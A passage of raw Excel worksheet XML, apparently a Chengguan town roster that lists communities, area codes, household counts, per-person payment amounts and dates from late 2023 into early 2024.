      </c>
      <c r="D1045" s="26" t="s">
        <v>2793</v>
      </c>
      <c r="E1045" s="26" t="s">
        <v>2794</v>
      </c>
      <c r="F1045" s="24" t="str">
        <f>F1044</f>
        <v>4113210108</v>
      </c>
      <c r="G1045" s="24"/>
      <c r="H1045" s="24"/>
      <c r="I1045" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1045" s="24"/>
      <c r="K1045" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1046" customHeight="1" spans="1:11">
      <c r="A1046" s="23" t="s">
        <v>2795</v>
      </c>
      <c r="B1046" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1046" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1046" s="24" t="s">
        <v>2796</v>
      </c>
      <c r="E1046" s="24" t="s">
        <v>2797</v>
      </c>
      <c r="F1046" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1046" s="24">
        <v>2</v>
      </c>
      <c r="H1046" s="25">
        <v>325</v>
      </c>
      <c r="I1046" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1046" s="24">
        <v>45170</v>
      </c>
      <c r="K1046" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1047" customHeight="1" spans="1:11">
      <c r="A1047" s="23" t="s">
        <v>2798</v>
      </c>
      <c r="B1047" s="24" t="str">
        <f>B1046</f>
        <v>城关镇</v>
      </c>
      <c r="C1047" s="24" t="str">
        <f>C1046</f>
        <v>西北社区</v>
      </c>
      <c r="D1047" s="26" t="s">
        <v>2799</v>
      </c>
      <c r="E1047" s="26" t="s">
        <v>2086</v>
      </c>
      <c r="F1047" s="24" t="str">
        <f>F1046</f>
        <v>4113210108</v>
      </c>
      <c r="G1047" s="24"/>
      <c r="H1047" s="24"/>
      <c r="I1047" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1047" s="24"/>
      <c r="K1047" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1048" customHeight="1" spans="1:11">
      <c r="A1048" s="23" t="s">
        <v>2800</v>
      </c>
      <c r="B1048" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1048" s="24" t="s">
        <v>2801</v>
      </c>
      <c r="D1048" s="24" t="s">
        <v>2802</v>
      </c>
      <c r="E1048" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F1048" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1048" s="24">
        <v>1</v>
      </c>
      <c r="H1048" s="25">
        <v>365</v>
      </c>
      <c r="I1048" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1048" s="24">
        <v>45170</v>
      </c>
      <c r="K1048" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1049" customHeight="1" spans="1:11">
      <c r="A1049" s="23" t="s">
        <v>2803</v>
      </c>
      <c r="B1049" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1049" s="24" t="s">
        <v>2804</v>
      </c>
      <c r="D1049" s="24" t="s">
        <v>2805</v>
      </c>
      <c r="E1049" s="24" t="s">
        <v>1741</v>
      </c>
      <c r="F1049" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1049" s="24">
        <v>1</v>
      </c>
      <c r="H1049" s="25">
        <v>365</v>
      </c>
      <c r="I1049" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1049" s="24">
        <v>45170</v>
      </c>
      <c r="K1049" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1050" customHeight="1" spans="1:11">
      <c r="A1050" s="23" t="s">
        <v>2806</v>
      </c>
      <c r="B1050" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1050" s="24" t="s">
        <v>2760</v>
      </c>
      <c r="D1050" s="24" t="s">
        <v>2807</v>
      </c>
      <c r="E1050" s="24" t="s">
        <v>980</v>
      </c>
      <c r="F1050" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1050" s="24">
        <v>1</v>
      </c>
      <c r="H1050" s="25">
        <v>365</v>
      </c>
      <c r="I1050" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1050" s="24">
        <v>45170</v>
      </c>
      <c r="K1050" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1051" customHeight="1" spans="1:11">
      <c r="A1051" s="23" t="s">
        <v>2808</v>
      </c>
      <c r="B1051" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1051" s="24" t="s">
        <v>2809</v>
      </c>
      <c r="D1051" s="24" t="s">
        <v>2810</v>
      </c>
      <c r="E1051" s="24" t="s">
        <v>1651</v>
      </c>
      <c r="F1051" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1051" s="24">
        <v>1</v>
      </c>
      <c r="H1051" s="25">
        <v>365</v>
      </c>
      <c r="I1051" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1051" s="24">
        <v>45170</v>
      </c>
      <c r="K1051" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1052" customHeight="1" spans="1:11">
      <c r="A1052" s="23" t="s">
        <v>2811</v>
      </c>
      <c r="B1052" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1052" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1052" s="24" t="s">
        <v>2812</v>
      </c>
      <c r="E1052" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F1052" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1052" s="24">
        <v>1</v>
      </c>
      <c r="H1052" s="25">
        <v>365</v>
      </c>
      <c r="I1052" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1052" s="24">
        <v>45170</v>
      </c>
      <c r="K1052" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1053" customHeight="1" spans="1:11">
      <c r="A1053" s="23" t="s">
        <v>2813</v>
      </c>
      <c r="B1053" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1053" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1053" s="24" t="s">
        <v>2814</v>
      </c>
      <c r="E1053" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F1053" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G1053" s="24">
        <v>1</v>
      </c>
      <c r="H1053" s="25">
        <v>365</v>
      </c>
      <c r="I1053" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1053" s="24">
        <v>45200</v>
      </c>
      <c r="K1053" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1054" customHeight="1" spans="1:11">
      <c r="A1054" s="23" t="s">
        <v>2815</v>
      </c>
      <c r="B1054" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1054" s="24" t="s">
        <v>2816</v>
      </c>
      <c r="D1054" s="24" t="s">
        <v>2817</v>
      </c>
      <c r="E1054" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F1054" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G1054" s="24">
        <v>2</v>
      </c>
      <c r="H1054" s="25">
        <v>325</v>
      </c>
      <c r="I1054" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1054" s="24">
        <v>45200</v>
      </c>
      <c r="K1054" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1055" customHeight="1" spans="1:11">
      <c r="A1055" s="23" t="s">
        <v>2818</v>
      </c>
      <c r="B1055" s="24" t="str">
        <f>B1054</f>
        <v>城关镇</v>
      </c>
      <c r="C1055" s="24" t="str">
        <f>C1054</f>
        <v>农业局（民主社区办理）</v>
      </c>
      <c r="D1055" s="26" t="s">
        <v>2819</v>
      </c>
      <c r="E1055" s="26" t="s">
        <v>2086</v>
      </c>
      <c r="F1055" s="24" t="str">
        <f>F1054</f>
        <v>4113210105</v>
      </c>
      <c r="G1055" s="24"/>
      <c r="H1055" s="24"/>
      <c r="I1055" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1055" s="24"/>
      <c r="K1055" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1056" customHeight="1" spans="1:11">
      <c r="A1056" s="23" t="s">
        <v>2820</v>
      </c>
      <c r="B1056" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1056" s="24" t="s">
        <v>2821</v>
      </c>
      <c r="D1056" s="24" t="s">
        <v>2822</v>
      </c>
      <c r="E1056" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F1056" s="24">
        <v>4113210104</v>
      </c>
      <c r="G1056" s="24">
        <v>1</v>
      </c>
      <c r="H1056" s="25">
        <v>365</v>
      </c>
      <c r="I1056" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1056" s="24">
        <v>45200</v>
      </c>
      <c r="K1056" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1057" customHeight="1" spans="1:11">
      <c r="A1057" s="23" t="s">
        <v>2823</v>
      </c>
      <c r="B1057" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1057" s="24" t="s">
        <v>2824</v>
      </c>
      <c r="D1057" s="24" t="s">
        <v>1035</v>
      </c>
      <c r="E1057" s="24" t="s">
        <v>2825</v>
      </c>
      <c r="F1057" s="24">
        <v>4113210104</v>
      </c>
      <c r="G1057" s="24">
        <v>1</v>
      </c>
      <c r="H1057" s="25">
        <v>365</v>
      </c>
      <c r="I1057" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1057" s="24">
        <v>45200</v>
      </c>
      <c r="K1057" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1058" customHeight="1" spans="1:11">
      <c r="A1058" s="23" t="s">
        <v>2826</v>
      </c>
      <c r="B1058" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1058" s="24" t="s">
        <v>2824</v>
      </c>
      <c r="D1058" s="24" t="s">
        <v>2827</v>
      </c>
      <c r="E1058" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F1058" s="24">
        <v>4113210104</v>
      </c>
      <c r="G1058" s="24">
        <v>2</v>
      </c>
      <c r="H1058" s="25">
        <v>325</v>
      </c>
      <c r="I1058" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1058" s="24">
        <v>45200</v>
      </c>
      <c r="K1058" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1059" customHeight="1" spans="1:11">
      <c r="A1059" s="23" t="s">
        <v>2828</v>
      </c>
      <c r="B1059" s="24" t="str">
        <f>B1058</f>
        <v>城关镇</v>
      </c>
      <c r="C1059" s="24" t="str">
        <f>C1058</f>
        <v>二建（南外社区办理）</v>
      </c>
      <c r="D1059" s="26" t="s">
        <v>2829</v>
      </c>
      <c r="E1059" s="26" t="s">
        <v>2830</v>
      </c>
      <c r="F1059" s="24">
        <f>F1058</f>
        <v>4113210104</v>
      </c>
      <c r="G1059" s="24"/>
      <c r="H1059" s="24"/>
      <c r="I1059" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1059" s="24"/>
      <c r="K1059" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1060" customHeight="1" spans="1:11">
      <c r="A1060" s="23" t="s">
        <v>2831</v>
      </c>
      <c r="B1060" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1060" s="24" t="s">
        <v>2832</v>
      </c>
      <c r="D1060" s="24" t="s">
        <v>2833</v>
      </c>
      <c r="E1060" s="24" t="s">
        <v>2834</v>
      </c>
      <c r="F1060" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1060" s="24">
        <v>1</v>
      </c>
      <c r="H1060" s="25">
        <v>365</v>
      </c>
      <c r="I1060" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1060" s="24">
        <v>45200</v>
      </c>
      <c r="K1060" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1061" customHeight="1" spans="1:11">
      <c r="A1061" s="23" t="s">
        <v>2835</v>
      </c>
      <c r="B1061" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1061" s="24" t="s">
        <v>2836</v>
      </c>
      <c r="D1061" s="24" t="s">
        <v>2837</v>
      </c>
      <c r="E1061" s="24" t="s">
        <v>1054</v>
      </c>
      <c r="F1061" s="24">
        <v>4113210106</v>
      </c>
      <c r="G1061" s="24">
        <v>1</v>
      </c>
      <c r="H1061" s="25">
        <v>365</v>
      </c>
      <c r="I1061" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1061" s="24">
        <v>45200</v>
      </c>
      <c r="K1061" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1062" customHeight="1" spans="1:11">
      <c r="A1062" s="23" t="s">
        <v>2838</v>
      </c>
      <c r="B1062" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1062" s="24" t="s">
        <v>2839</v>
      </c>
      <c r="D1062" s="24" t="s">
        <v>2840</v>
      </c>
      <c r="E1062" s="24" t="s">
        <v>2841</v>
      </c>
      <c r="F1062" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1062" s="24">
        <v>1</v>
      </c>
      <c r="H1062" s="25">
        <v>365</v>
      </c>
      <c r="I1062" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1062" s="24">
        <v>45231</v>
      </c>
      <c r="K1062" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1063" customHeight="1" spans="1:11">
      <c r="A1063" s="23" t="s">
        <v>2842</v>
      </c>
      <c r="B1063" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1063" s="24" t="s">
        <v>2809</v>
      </c>
      <c r="D1063" s="24" t="s">
        <v>2843</v>
      </c>
      <c r="E1063" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F1063" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1063" s="24">
        <v>1</v>
      </c>
      <c r="H1063" s="25">
        <v>365</v>
      </c>
      <c r="I1063" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1063" s="24">
        <v>45231</v>
      </c>
      <c r="K1063" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1064" customHeight="1" spans="1:11">
      <c r="A1064" s="23" t="s">
        <v>2844</v>
      </c>
      <c r="B1064" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1064" s="24" t="s">
        <v>2755</v>
      </c>
      <c r="D1064" s="24" t="s">
        <v>2845</v>
      </c>
      <c r="E1064" s="24" t="s">
        <v>320</v>
      </c>
      <c r="F1064" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1064" s="24">
        <v>2</v>
      </c>
      <c r="H1064" s="25">
        <v>325</v>
      </c>
      <c r="I1064" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1064" s="24">
        <v>45231</v>
      </c>
      <c r="K1064" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1065" customHeight="1" spans="1:11">
      <c r="A1065" s="23" t="s">
        <v>2846</v>
      </c>
      <c r="B1065" s="24" t="str">
        <f>B1064</f>
        <v>城关镇</v>
      </c>
      <c r="C1065" s="24" t="str">
        <f>C1064</f>
        <v>外贸局中华办理</v>
      </c>
      <c r="D1065" s="26" t="s">
        <v>2847</v>
      </c>
      <c r="E1065" s="26" t="s">
        <v>2848</v>
      </c>
      <c r="F1065" s="24" t="str">
        <f>F1064</f>
        <v>4113210108</v>
      </c>
      <c r="G1065" s="24"/>
      <c r="H1065" s="24"/>
      <c r="I1065" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1065" s="24"/>
      <c r="K1065" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1066" customHeight="1" spans="1:11">
      <c r="A1066" s="23" t="s">
        <v>2849</v>
      </c>
      <c r="B1066" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1066" s="24" t="s">
        <v>2850</v>
      </c>
      <c r="D1066" s="24" t="s">
        <v>2851</v>
      </c>
      <c r="E1066" s="24" t="s">
        <v>2852</v>
      </c>
      <c r="F1066" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1066" s="24">
        <v>2</v>
      </c>
      <c r="H1066" s="25">
        <v>375</v>
      </c>
      <c r="I1066" s="24">
        <f t="shared" si="16"/>
        <v>750</v>
      </c>
      <c r="J1066" s="24">
        <v>45231</v>
      </c>
      <c r="K1066" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1067" customHeight="1" spans="1:11">
      <c r="A1067" s="23" t="s">
        <v>2853</v>
      </c>
      <c r="B1067" s="24" t="str">
        <f>B1066</f>
        <v>城关镇</v>
      </c>
      <c r="C1067" s="24" t="str">
        <f>C1066</f>
        <v>饮食服务公司中华办理</v>
      </c>
      <c r="D1067" s="26" t="s">
        <v>2854</v>
      </c>
      <c r="E1067" s="26" t="s">
        <v>2275</v>
      </c>
      <c r="F1067" s="24" t="str">
        <f>F1066</f>
        <v>4113210108</v>
      </c>
      <c r="G1067" s="24"/>
      <c r="H1067" s="24"/>
      <c r="I1067" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1067" s="24"/>
      <c r="K1067" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1068" customHeight="1" spans="1:11">
      <c r="A1068" s="23" t="s">
        <v>2855</v>
      </c>
      <c r="B1068" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1068" s="24" t="s">
        <v>2856</v>
      </c>
      <c r="D1068" s="24" t="s">
        <v>2857</v>
      </c>
      <c r="E1068" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F1068" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1068" s="24">
        <v>1</v>
      </c>
      <c r="H1068" s="25">
        <v>365</v>
      </c>
      <c r="I1068" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1068" s="24">
        <v>45231</v>
      </c>
      <c r="K1068" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1069" customHeight="1" spans="1:11">
      <c r="A1069" s="23" t="s">
        <v>2858</v>
      </c>
      <c r="B1069" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1069" s="24" t="s">
        <v>2032</v>
      </c>
      <c r="D1069" s="24" t="s">
        <v>2859</v>
      </c>
      <c r="E1069" s="24" t="s">
        <v>1079</v>
      </c>
      <c r="F1069" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1069" s="24">
        <v>1</v>
      </c>
      <c r="H1069" s="25">
        <v>365</v>
      </c>
      <c r="I1069" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1069" s="24">
        <v>45231</v>
      </c>
      <c r="K1069" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1070" customHeight="1" spans="1:11">
      <c r="A1070" s="23" t="s">
        <v>2860</v>
      </c>
      <c r="B1070" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1070" s="24" t="s">
        <v>2861</v>
      </c>
      <c r="D1070" s="24" t="s">
        <v>2862</v>
      </c>
      <c r="E1070" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F1070" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1070" s="24">
        <v>2</v>
      </c>
      <c r="H1070" s="25">
        <v>325</v>
      </c>
      <c r="I1070" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1070" s="24">
        <v>45231</v>
      </c>
      <c r="K1070" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1071" customHeight="1" spans="1:11">
      <c r="A1071" s="23" t="s">
        <v>2863</v>
      </c>
      <c r="B1071" s="24" t="str">
        <f>B1070</f>
        <v>城关镇</v>
      </c>
      <c r="C1071" s="24" t="str">
        <f>C1070</f>
        <v>剧团西北办理</v>
      </c>
      <c r="D1071" s="26" t="s">
        <v>2864</v>
      </c>
      <c r="E1071" s="26" t="s">
        <v>2865</v>
      </c>
      <c r="F1071" s="24" t="str">
        <f>F1070</f>
        <v>4113210108</v>
      </c>
      <c r="G1071" s="24"/>
      <c r="H1071" s="24"/>
      <c r="I1071" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1071" s="24"/>
      <c r="K1071" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1072" customHeight="1" spans="1:11">
      <c r="A1072" s="23" t="s">
        <v>2866</v>
      </c>
      <c r="B1072" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1072" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1072" s="24" t="s">
        <v>2867</v>
      </c>
      <c r="E1072" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F1072" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1072" s="24">
        <v>1</v>
      </c>
      <c r="H1072" s="25">
        <v>365</v>
      </c>
      <c r="I1072" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1072" s="24">
        <v>45231</v>
      </c>
      <c r="K1072" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1073" customHeight="1" spans="1:11">
      <c r="A1073" s="23" t="s">
        <v>2868</v>
      </c>
      <c r="B1073" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1073" s="24" t="s">
        <v>2051</v>
      </c>
      <c r="D1073" s="24" t="s">
        <v>2869</v>
      </c>
      <c r="E1073" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F1073" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1073" s="24">
        <v>2</v>
      </c>
      <c r="H1073" s="25">
        <v>325</v>
      </c>
      <c r="I1073" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1073" s="24">
        <v>45231</v>
      </c>
      <c r="K1073" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1074" customHeight="1" spans="1:11">
      <c r="A1074" s="23" t="s">
        <v>2870</v>
      </c>
      <c r="B1074" s="24" t="str">
        <f>B1073</f>
        <v>城关镇</v>
      </c>
      <c r="C1074" s="24" t="str">
        <f>C1073</f>
        <v>西北社区</v>
      </c>
      <c r="D1074" s="26" t="s">
        <v>2871</v>
      </c>
      <c r="E1074" s="26" t="s">
        <v>2530</v>
      </c>
      <c r="F1074" s="24" t="str">
        <f>F1073</f>
        <v>4113210108</v>
      </c>
      <c r="G1074" s="24"/>
      <c r="H1074" s="24"/>
      <c r="I1074" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1074" s="24"/>
      <c r="K1074" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1075" customHeight="1" spans="1:11">
      <c r="A1075" s="23" t="s">
        <v>2872</v>
      </c>
      <c r="B1075" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1075" s="24" t="s">
        <v>1674</v>
      </c>
      <c r="D1075" s="24" t="s">
        <v>2873</v>
      </c>
      <c r="E1075" s="24" t="s">
        <v>249</v>
      </c>
      <c r="F1075" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G1075" s="24">
        <v>1</v>
      </c>
      <c r="H1075" s="25">
        <v>365</v>
      </c>
      <c r="I1075" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1075" s="24">
        <v>45231</v>
      </c>
      <c r="K1075" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1076" customHeight="1" spans="1:11">
      <c r="A1076" s="23" t="s">
        <v>2874</v>
      </c>
      <c r="B1076" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1076" s="24" t="s">
        <v>2875</v>
      </c>
      <c r="D1076" s="24" t="s">
        <v>2876</v>
      </c>
      <c r="E1076" s="24" t="s">
        <v>2877</v>
      </c>
      <c r="F1076" s="24">
        <v>4113210107</v>
      </c>
      <c r="G1076" s="24">
        <v>1</v>
      </c>
      <c r="H1076" s="25">
        <v>365</v>
      </c>
      <c r="I1076" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1076" s="24">
        <v>45261</v>
      </c>
      <c r="K1076" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1077" customHeight="1" spans="1:11">
      <c r="A1077" s="23" t="s">
        <v>2878</v>
      </c>
      <c r="B1077" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1077" s="24" t="s">
        <v>2879</v>
      </c>
      <c r="D1077" s="24" t="s">
        <v>2880</v>
      </c>
      <c r="E1077" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F1077" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G1077" s="24">
        <v>1</v>
      </c>
      <c r="H1077" s="25">
        <v>365</v>
      </c>
      <c r="I1077" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1077" s="24">
        <v>45261</v>
      </c>
      <c r="K1077" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1078" customHeight="1" spans="1:11">
      <c r="A1078" s="23" t="s">
        <v>2881</v>
      </c>
      <c r="B1078" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1078" s="24" t="s">
        <v>2882</v>
      </c>
      <c r="D1078" s="24" t="s">
        <v>2883</v>
      </c>
      <c r="E1078" s="24" t="s">
        <v>2884</v>
      </c>
      <c r="F1078" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G1078" s="24">
        <v>2</v>
      </c>
      <c r="H1078" s="25">
        <v>325</v>
      </c>
      <c r="I1078" s="24">
        <f t="shared" si="16"/>
        <v>650</v>
      </c>
      <c r="J1078" s="24">
        <v>45292</v>
      </c>
      <c r="K1078" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1079" customHeight="1" spans="1:11">
      <c r="A1079" s="23" t="s">
        <v>2885</v>
      </c>
      <c r="B1079" s="24" t="str">
        <f>B1078</f>
        <v>城关镇</v>
      </c>
      <c r="C1079" s="24" t="str">
        <f>C1078</f>
        <v>法院（民主社区办理）</v>
      </c>
      <c r="D1079" s="33" t="s">
        <v>2886</v>
      </c>
      <c r="E1079" s="33" t="s">
        <v>2887</v>
      </c>
      <c r="F1079" s="24" t="str">
        <f>F1078</f>
        <v>4113210105</v>
      </c>
      <c r="G1079" s="24"/>
      <c r="H1079" s="24"/>
      <c r="I1079" s="24">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="J1079" s="24"/>
      <c r="K1079" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1080" customHeight="1" spans="1:11">
      <c r="A1080" s="23" t="s">
        <v>2888</v>
      </c>
      <c r="B1080" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1080" s="24" t="s">
        <v>2889</v>
      </c>
      <c r="D1080" s="24" t="s">
        <v>2890</v>
      </c>
      <c r="E1080" s="24" t="s">
        <v>273</v>
      </c>
      <c r="F1080" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G1080" s="24">
        <v>1</v>
      </c>
      <c r="H1080" s="25">
        <v>365</v>
      </c>
      <c r="I1080" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1080" s="24">
        <v>45292</v>
      </c>
      <c r="K1080" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1081" customHeight="1" spans="1:11">
      <c r="A1081" s="23" t="s">
        <v>2891</v>
      </c>
      <c r="B1081" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1081" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1081" s="24" t="s">
        <v>2892</v>
      </c>
      <c r="E1081" s="24" t="s">
        <v>2375</v>
      </c>
      <c r="F1081" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1081" s="24">
        <v>1</v>
      </c>
      <c r="H1081" s="25">
        <v>365</v>
      </c>
      <c r="I1081" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1081" s="24">
        <v>45292</v>
      </c>
      <c r="K1081" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1082" customHeight="1" spans="1:11">
      <c r="A1082" s="23" t="s">
        <v>2893</v>
      </c>
      <c r="B1082" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1082" s="24" t="s">
        <v>2035</v>
      </c>
      <c r="D1082" s="24" t="s">
        <v>2894</v>
      </c>
      <c r="E1082" s="24" t="s">
        <v>2895</v>
      </c>
      <c r="F1082" s="24">
        <v>4113210103</v>
      </c>
      <c r="G1082" s="24">
        <v>1</v>
      </c>
      <c r="H1082" s="25">
        <v>365</v>
      </c>
      <c r="I1082" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1082" s="24">
        <v>45292</v>
      </c>
      <c r="K1082" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1083" customHeight="1" spans="1:11">
      <c r="A1083" s="23" t="s">
        <v>2896</v>
      </c>
      <c r="B1083" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1083" s="24" t="s">
        <v>2897</v>
      </c>
      <c r="D1083" s="24" t="s">
        <v>2898</v>
      </c>
      <c r="E1083" s="24" t="s">
        <v>2899</v>
      </c>
      <c r="F1083" s="24">
        <v>4113210108</v>
      </c>
      <c r="G1083" s="24">
        <v>1</v>
      </c>
      <c r="H1083" s="25">
        <v>365</v>
      </c>
      <c r="I1083" s="24">
        <f t="shared" si="16"/>
        <v>365</v>
      </c>
      <c r="J1083" s="24">
        <v>45292</v>
      </c>
      <c r="K1083" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1084" customHeight="1" spans="1:11">
      <c r="A1084" s="23" t="s">
        <v>2900</v>
      </c>
      <c r="B1084" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C1084" s="24" t="s">
        <v>2901</v>
      </c>
